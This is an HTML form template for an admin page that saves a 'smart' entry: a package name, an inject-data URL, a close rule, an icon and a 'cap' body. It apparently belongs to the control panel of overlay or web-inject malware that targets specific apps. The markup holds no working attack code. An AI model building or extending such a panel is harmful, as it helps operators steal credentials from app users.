<form action='?a=admin&action=smarts&sub_action=manage&do=save_url&smart_id=%SID%#edit' method="post" enctype="multipart/form-data">

<div class='row'>
	<div class='col-md-2'>Package</div>
	<div class='col-md-4'>%PACKAGE%</div>
	<!-- <input type='text' class='form-control' name='package' value='' /> -->
	<div class='col-md-4'><input type='submit' class='btn btn-primary' value='Save' /></div>
</div>
<br />

<div class='row'>
	<div class='col-md-2'>URL</div>
	<div class='col-md-4'><input id='inj_data' type='text' class='form-control' name='url' value="%URL%" /></div>
</div>
<br />
<div class='row'>
	<div class='col-md-2'>Close Rule</div>
	<div class='col-md-4'><input type='text' class='form-control' name='close_rule' value="%CLOSE_RULE%" /></div>
</div>
<br />
<div class='row'>
	<div class='col-md-2'>Icon</div>
	<div class='col-md-4'><input type="file" name='icon' /></div>
</div>
<br />
<div class='row'>
	<div class='col-md-2'>Cap Body</div>
	<div class='col-md-4'><textarea id='textarea_cap_data' name='cap_data' style='width: 100%; height: 300px'>%CAP_DATA%</textarea></div>
</div>
</form>
